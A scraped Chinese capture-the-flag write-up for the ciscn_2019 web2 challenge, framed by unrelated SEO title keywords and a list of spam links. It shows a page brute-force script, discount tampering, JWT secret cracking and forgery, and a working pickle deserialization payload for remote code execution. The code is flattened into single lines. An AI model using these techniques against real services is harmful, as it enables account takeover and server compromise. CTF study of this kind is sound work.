当前位置: 首页 > news >正文

英语做课后作业的网站市场调研问卷

英语做课后作业的网站,市场调研问卷,网站建设的好处和目的,外贸网站建设产品ciscn_2019_web_northern_china_day1_web2 BEGIN 拿到题目,先看看 这里发现一个很像提示的东西,然后发现下面是一堆小电视商品,有lv等级和金钱,所以这题的入口可能就是再lv6和这个资金募集上 然后点击下next,看看页…

ciscn_2019_web_northern_china_day1_web2

BEGIN

拿到题目,先看看
在这里插入图片描述
这里发现一个很像提示的东西,然后发现下面是一堆小电视商品,有lv等级和金钱,所以这题的入口可能就是再lv6和这个资金募集上
然后点击下next,看看页数的参数,然后爆破一下(注意看看lv信息是怎么显示的,这里是图片名

爆破lv6

import requestsurl = 'http://192.168.163.128:8083/shop?page='for i in range(1, 1000):r = requests.get(url + str(i))if 'lv6.png' in r.text:print(i)break

爆破出结果是181
然后就购买但是金额不够(记得注册登录
然后看到有折扣,就抓包试试能不能改

抓包修改折扣

change discount
修改完后,发现返回一个Location(主要也没别的信息了(毕竟也不是404,502啥的
然后就访问url\blg_m4mber
然后⬇️
在这里插入图片描述

JWT伪造

怎么越权呢,先抓个包
然后发现有JWT::Json web token (JWT)
直达➡️JWT伪造

在这里插入图片描述
然后就复现一下JWT伪造,把secret key爆破出来
把JWT换成自己的
在这里插入图片描述
然后到https://jwt.io/生成一下(先放原有的然后修改user和secret key,就ok了)
生成伪造的JWT
在这里插入图片描述
这里还卡了一下,因为我是把JWT用burp传的,然后看不到提示信息(burp raw不支持中文 😢

康康wp,F12开始操作

在这里插入图片描述
在这里插入图片描述
然后下载源码然后又卡住了

代码审计

漏洞:pickle.loads unserialize执行魔术方法造成rce

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllibclass AdminHandler(BaseHandler):@tornado.web.authenticateddef get(self, *args, **kwargs):if self.current_user == "admin":return self.render('form.html', res='This is Black Technology!', member=0)else:return self.render('no_ass.html')@tornado.web.authenticateddef post(self, *args, **kwargs):try:become = self.get_argument('become')p = pickle.loads(urllib.unquote(become))return self.render('form.html', res=p, member=1)except:return self.render('form.html', res='This is Black Technology!', member=0)

payload

注意到,urllib.unquote()python2的用法,python3中使用urllib.parse.unquote()

#!/usr/bin/env python2.7
import pickle
import urllibclass payload(object):def __reduce__(self):return (eval, ("open('/flag.txt','r').read()",))a = pickle.dumps(payload())
a = urllib.quote(a)
print a

然后通过become传参

还好不是只能在源码里看,一开始真没在raw中找到,然后就render看看,毕竟都200OK了结果没看到flag 😓
卡挺久的

在这里插入图片描述

OVER

抓包+JWT+pickle反序列化RCE

http://www.dt0577.cn/news/45738.html

相关文章:

  • 建设银行银行官网网站优化大师官网下载安装
  • 网站首页优化的目的seo自动排名软件
  • 企业网站 微信里怎么做长沙网站关键词排名
  • 长沙企业网站建设服务今日头条新闻大事
  • 如何看出网站用dede做的郑州seo询搜点网络效果佳
  • 建设部精神文明建设网站中国市场营销网网站
  • 网站制作和网页制作是不是一样宁德市地图
  • 做公号模版网站阿里数据
  • 二级网站建设方案模板湖南网站建设seo
  • 软文网站备案如何查询抖音搜索排名优化
  • 做网站方法快链友情链接平台
  • 杭州网站制作平台合肥seo排名扣费
  • wordpress 多用户 域名郑州seo技术
  • 网站视差滚动小说排行榜百度
  • 网站建设模块化实现站长统计app进入网址
  • wordpress商城支付青岛seo服务公司
  • 西安 网站建设 培训班信息流广告哪个平台好
  • 沈阳网站制作思路公司网站页面设计
  • 做宣传的网站有哪些5118数据分析平台
  • iis 网站 红苏州疫情最新通知
  • 网站建设广州天河区青岛谷歌seo
  • 1m的带宽做网站可以吗免费b站推广网站链接
  • jsp做网站教程在线刷seo
  • 日本人做鸭网站公司品牌宣传
  • 房产网站怎么做才能吸引人网站怎么优化搜索
  • 福田专门做网站推广公司网络推广员上班靠谱吗
  • 有没有教做化学药品的网站有道搜索引擎入口
  • 网站制作复杂吗今日新闻快报
  • 加盟招商网站建设方案开发一个app需要多少钱
  • 销售一个产品的网站怎么做口碑营销的形式